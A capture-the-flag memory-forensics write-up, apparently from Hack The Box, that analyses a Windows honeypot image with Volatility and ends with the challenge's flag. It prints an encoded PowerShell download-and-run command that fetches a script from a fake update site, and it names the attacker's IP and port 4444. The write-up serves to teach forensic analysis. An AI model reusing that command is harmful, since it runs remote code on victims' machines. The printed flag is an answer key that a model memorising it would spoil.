Instructions
Santa really encourages people to be at his good list but sometimes he is a bit naughty himself. He is using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics expert, can you help him identify any indications of compromise?
- Find the full URL used to download the malware.
- Find the malicious’s process ID.
- Find the attackers IP
Flag Format: HTB{echo -n “http://url.com/path.foo_PID_127.0.0.1” | md5sum}
Download Link: honeypot.raw
Prerequisites
Python requirements.txt
:
volatility3
yara-python
pycryptodome
capstone
Solution
By dumping the memory for the Internet Explorer process at pid 3344 with volatility and grepping for all http links we come across the website where the malware was downloaded from.
$ vol -f ../honeypot.raw windows.vadinfo --pid 3344 --dump
$ cat * | grep http
https://windowsliveupdater.com/christmas_update.hta
Listing the full command arguments for each process we can see that the powershell.exe process is downloading and running a script from that same fake update website.
$ vol -f ../honeypot.raw windows.cmdline
2700 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
Lastly, the network connections show an established connection with port 4444 to the host 147.182.172.189. This is the attacker’s IP address.
$ vol -f ../honeypot.raw windows.netscan
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created
0x3ee98d80 TCPv4 10.0.2.15 49229 147.182.172.189 4444 ESTABLISHED - - -
Putting all the information together:
echo -n "https://windowsliveupdater.com/christmas_update.hta_2700_147.182.172.189" | md5sum
969b934d7396d043a50a37b70e1e010a -
HTB{969b934d7396d043a50a37b70e1e010a}